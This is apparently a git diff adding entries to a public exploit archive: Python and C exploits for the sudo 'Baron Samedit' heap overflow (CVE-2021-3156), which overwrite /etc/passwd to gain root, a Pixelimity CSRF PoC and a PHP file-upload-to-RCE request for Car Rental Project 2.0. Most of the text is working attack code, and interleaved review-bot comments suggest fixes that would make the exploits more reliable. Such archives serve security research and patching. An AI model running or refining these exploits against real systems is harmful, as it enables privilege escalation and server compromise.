diff --git a/exploits/multiple/local/49521.py b/exploits/multiple/local/49521.py
new file mode 100755
index 000000000..79a7c2f36
--- /dev/null
+++ b/exploits/multiple/local/49521.py
@@ -0,0 +1,139 @@ +# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1) +# Date: 2021-02-02 +# Exploit Author: West Shepherd +# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1. +# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31 +# CVE : CVE-2021-3156 +# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code. +# Sources: +# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit +# (2) https://github.com/stong/CVE-2021-3156 +# Requirements: Python3 + +#!/usr/bin/python3 +import os +import pwd +import time +import sys +import argparse + + +class Exploit(object): + username = '' + size = 0 + data = '' + + def __init__(self, source, target, sleep): + self.sleep = sleep + self.source = source + self.target = target + + @staticmethod + def readFile(path): + return open(path, 'r').read() + + @staticmethod + def getUser(): + return pwd.getpwuid(os.getuid())[0] + + @staticmethod + def getSize(path): + return os.stat(path).st_size + + def main(self): + self.username = self.getUser() + self.data = self.readFile(self.source) + self.size = self.getSize(self.target) + environ = { + '\n\n\n\n\n': '\n' + self.data, + 'SUDO_ASKPASS': '/bin/false', + 'LANG': +'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', + 'A': 'A' * 0xffff + } + for i in range(5000): + directory = +'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i + overflow = +'11111111111111111111111111111111111111111111111111111111%s' % +directory + + if os.path.exists(directory): + sys.stdout.write('file exists %s\n' % directory) + continue + + child = os.fork() + os.environ = environ + if child: + sys.stdout.write('[+] parent %d \n' % i) + sys.stdout.flush() + time.sleep(self.sleep) + if not os.path.exists(directory): + try: + os.mkdir(directory, 0o700) + 
os.symlink(self.target, '%s/%s' % (directory, +self.username)) + os.waitpid(child, 0) + except: + continue + else: + sys.stdout.write('[+] child %d \n' % i) + sys.stdout.flush() + os.setpriority(os.PRIO_PROCESS, 0, 20) + os.execve( + path='/usr/bin/sudoedit', + argv=[ + '/usr/bin/sudoedit', + '-A', + '-s', + '\\', + overflow + ], + env=environ + ) + sys.stdout.write('[!] execve failed\n') + sys.stdout.flush() + os.abort() + break + + if self.size != self.getSize(self.target): + sys.stdout.write('[*] success at iteration %d \n' % i) + sys.stdout.flush() + break + sys.stdout.write(""" + \nConsider the following if the exploit fails: + \n\t(1) If all directories are owned by root then sleep +needs to be decreased. + \n\t(2) If they're all owned by you, then sleep needs +increased. + """) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + add_help=True, + description='* Sudo Privilege Escalation / Heap Overflow - +CVE-2021-3156 *' + ) + try: + parser.add_argument('-source', action='store', help='Path to +malicious "passwd" file to overwrite the target') + parser.add_argument('-target', action='store', help='Target +file path to be overwritten (default: /etc/passwd)') + parser.add_argument('-sleep', action='store', help='Sleep +setting for forked processes (default: 0.01 seconds') + parser.set_defaults(target='/etc/passwd', sleep='0.01') + + options = parser.parse_args() + if options.source is None: + parser.print_help() + sys.exit(1) + + exp = Exploit( + source=options.source, + target=options.target, + sleep=float(options.sleep) + ) + exp.main() + except Exception as err: + sys.stderr.write(str(err)) \ No newline at end of file diff --git a/exploits/multiple/local/49522.c b/exploits/multiple/local/49522.c new file mode 100644 index 000000000..5cc260334 --- /dev/null +++ b/exploits/multiple/local/49522.c 
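Review bot: The `#!/usr/bin/python3` shebang sits after the comment header (line 13 of the new file) while the file is added with mode 100755, so running it directly as `./49521.py` will not invoke Python; move the shebang to the first line, above `# Exploit Title`. As rendered here several long statements also appear hard-wrapped outside any bracket (`directory =` / `'AAAA…%08d' % i`, `overflow =` / `'111…%s' %` / `directory`, and the `description='… Heap Overflow -` / `CVE-2021-3156 *'` string), which would make the committed file a SyntaxError; if those breaks are real they need `\` continuations or re-joining. In the parent branch the bare `except: continue` wraps `os.waitpid(child, 0)` as well, so a failed `mkdir`/`symlink` (e.g. a directory left by an earlier run) skips the reap, leaves the sudoedit child unwaited and lets the size check run before it has finished; catch `OSError` around the mkdir/symlink only and call `os.waitpid(child, 0)` unconditionally after the try. The success test `self.size != self.getSize(self.target)` also misses a replacement file of the same size as the original, which is worth a comment beside the `-source` help text.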
@@ -0,0 +1,151 @@ +# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2) +# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty +# Date: 30.01.2021 +# Vendor: https://www.sudo.ws/ +# Link: https://www.sudo.ws/download.html +# CVE: CVE-2021-3156 + +[+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021 + +[Exploit Program Code] + +// Exploit by @gf_256 aka cts +// With help from r4j +// Debug by @nu11secur1ty +// Original advisory by Baron Samedit of Qualys + +// Tested on Ubuntu 18.04 and 20.04 & 20.04.01 +// You will probably need to adjust RACE_SLEEP_TIME. + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// !!! best value of this varies from system-to-system !!! +// !!! you will probably need to tune this !!! +#define RACE_SLEEP_TIME 10000 + +char *target_file; +char *src_file; + +size_t query_target_size() +{ + struct stat st; + stat(target_file, &st); + return st.st_size; +} + +char* read_src_contents() +{ + FILE* f = fopen(src_file, "rb"); + if (!f) { + puts("oh no baby what are you doing :("); + abort(); + } + fseek(f, 0, SEEK_END); + long fsize = ftell(f); + fseek(f, 0, SEEK_SET); + char *content = malloc(fsize + 1); + fread(content, 1, fsize, f); + fclose(f); + return content; +} + +char* get_my_username() +{ + // getlogin can return incorrect result (for example, root under su)! 
+ struct passwd *pws = getpwuid(getuid()); + return strdup(pws->pw_name); +} + +int main(int my_argc, char **my_argv) +{ + puts("CVE-2021-3156 PoC by @gf_256"); + puts("original advisory by Baron Samedit"); + + if (my_argc != 3) { + puts("./meme "); + puts("Example: ./meme /etc/passwd my_fake_passwd_file"); + return 1; + } + target_file = my_argv[1]; + src_file = my_argv[2]; + printf("we will overwrite %s with stuff from %s\n", target_file, src_file); + + char* myusername = get_my_username(); + printf("hi, my name is %s\n", myusername); + + size_t initial_size = query_target_size(); + printf("%s is %zi big right now\n", target_file, initial_size); + + char* stuff_to_write = read_src_contents(); + + char memedir[1000]; + char my_symlink[1000]; + char overflow[1000]; + + char* bigstuff = calloc(1,0x10000); + memset(bigstuff, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address + + char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\", overflow, NULL + }; + + char *envp[] = { + "\n\n\n\n\n", // put some newlines here to separate our real contents from the junk stuff_to_write, + "SUDO_ASKPASS=/bin/false", "LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +", bigstuff, NULL + }; + + puts("ok podracing time bitches"); + + // Boom =) + // for (int i = 0; i < 5000; i++) + for (int i = 0; i < 3000; i++) { + sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i); + sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir); + sprintf(my_symlink, "%s/%s", memedir, myusername); + puts(memedir); + + if (access(memedir, F_OK) == 0) { + printf("dude, %s already exists, do it from a clean working dir\n", memedir); + return 1; + } + + pid_t childpid = fork(); + if (childpid) { // parent + usleep(RACE_SLEEP_TIME); + mkdir(memedir, 0700); + symlink(target_file, my_symlink); + waitpid(childpid, 0, 0); + } else { // child + setpriority(PRIO_PROCESS, 0, 20); // set 
nice to 20 for race reliability
+ execve("/usr/bin/sudoedit", argv, envp); // noreturn
+ puts("execve fails?!");
+ abort();
+ }
+
+ if (query_target_size() != initial_size) {
+ puts("target file has a BRUH MOMENT!!!! SUCCess???");
+ system("xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'");
+// ayy lmao
+ return 0;
+ }
+ }
+
+ puts("Failed?");
+ puts("if all the meme dirs are owned by root, the usleep needs to be decreased.");
+ puts("if they're all owned by you, the usleep needs to be increased");
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49519.html b/exploits/multiple/webapps/49519.html
new file mode 100644
index 000000000..96723655d
--- /dev/null
+++ b/exploits/multiple/webapps/49519.html
@@ -0,0 +1,37 @@
+# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
+# Date: 2020-06-03
+# Exploit Author: Noth
+# Vendor Homepage: https://github.com/pixelimity/pixelimity
+# Software Link: https://github.com/pixelimity/pixelimity
+# Version: v1.0
+# CVE : 2020-23522
+
+Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.
+
+PoC :
+
+
+
+
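Review bot: `read_src_contents` allocates `fsize + 1` bytes and `fread`s `fsize` of them but never writes the terminator, so the buffer handed to execve as an environment string is not NUL-terminated and whatever follows it on the heap is appended to the overwrite; add `content[fsize] = '\0';` after the `fread`, and check the `ftell` and `fread` results before trusting `fsize`. `query_target_size` ignores the `stat` return value, so on a missing or unreadable target `st.st_size` is uninitialized stack data and the `query_target_size() != initial_size` comparison can report success on nothing; `if (stat(target_file, &st) != 0) { perror("stat"); exit(1); }` is enough. As rendered here `stuff_to_write,` sits on the same line as the `// put some newlines …` comment in the `envp` initializer and the `LANG=` literal is split across two lines before `", bigstuff, NULL`, which would comment the payload out of the environment and stop the file compiling; if the committed file really carries those mail wraps, the initializer needs to be restored to one element per line. The `#include` lines also show no header names in this view — presumably stripped by rendering, but worth confirming.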
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49520.py b/exploits/php/webapps/49520.py
new file mode 100755
index 000000000..e630a1608
--- /dev/null
+++ b/exploits/php/webapps/49520.py
@@ -0,0 +1,40 @@
+# Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution
+# Date: 3/2/2021
+# Exploit Author: Jannick Tiger
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
+# Version: V 2.0
+# Tested on Windows 10, XAMPP
+
+POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
+Gecko/20100101 Firefox/85.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------346751171915680139113101061568
+Content-Length: 369
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/carrental/admin/changeimage1.php?imgid=4
+Cookie: PHPSESSID=te82lj6tvep7afns0qm890393e
+Upgrade-Insecure-Requests: 1
+
+-----------------------------346751171915680139113101061568
+Content-Disposition: form-data; name="img1"; filename="1.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------346751171915680139113101061568
+Content-Disposition: form-data; name="update"
+
+
+-----------------------------346751171915680139113101061568--
+
+
+# Uploaded Malicious File can be Found in :
+carrental\admin\img\vehicleimages\1.php
+# go to http://localhost/carrental/admin/img/vehicleimages/1.php, Execute malicious code via post value phpinfo();
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4d699dfdf..7ca8055c2
--- a/files_exploits.csv
+++ b/files_exploits.csv
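Review bot: The `# CVE :` header gives `2020-23522` without the `CVE-` prefix, inconsistent with the other headers in this commit (`# CVE : CVE-2021-3156`); change it to `# CVE : CVE-2020-23522`. The description also does not say whose session the forged request to `admin/setting.php` rides on — presumably a logged-in administrator lured to the page — nor the HTTP method used, so a one-line note such as `Requires the victim to be authenticated to the Pixelimity admin panel in the same browser` would make the PoC's preconditions explicit. The form markup itself is not visible in this rendering, so the request body cannot be reviewed here.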
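Review bot: The new file is committed as `49520.py` with mode 100755, but its body is a raw HTTP request transcript rather than Python, so it cannot be executed and will break anything that runs the `.py` exploits; store it as `.txt` or wrap the request in an `http.client`/`requests` script. In this rendering the `img1` part's body between `Content-Type: application/octet-stream` and the next boundary is empty — the PHP payload (the `# go to …` line implies it evals a POST value) has presumably been stripped as markup — so `Content-Length: 369` and the payload should be checked against what was actually committed, and the shell's contents spelled out in a comment. The request goes to `/carrental/admin/changeimage1.php` and carries a `PHPSESSID` cookie, which reads as an authenticated admin action; if so, the title should say `(Authenticated)` like the `Klog Server 2.4.1 - Command Injection (Authenticated)` entry in `files_exploits.csv`.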
@@ -11252,6 +11252,8 @@ id,file,description,date,author,type,platform,port
 49516,exploits/solaris/local/49516.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2021-02-02,"Marco Ivaldi",local,solaris,
 49517,exploits/solaris/local/49517.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2021-02-02,"Marco Ivaldi",local,solaris,
 49518,exploits/solaris/local/49518.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)",2021-02-02,"Marco Ivaldi",local,solaris,
+49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",2021-02-03,"West Shepherd",local,multiple,
+49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",2021-02-03,nu11secur1ty,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43710,3 +43712,5 @@ id,file,description,date,author,type,platform,port
 49511,exploits/php/webapps/49511.py,"Klog Server 2.4.1 - Command Injection (Authenticated)",2021-02-01,"Metin Yunus Kandemir",webapps,php,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,
 49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php,
+49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,
+49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,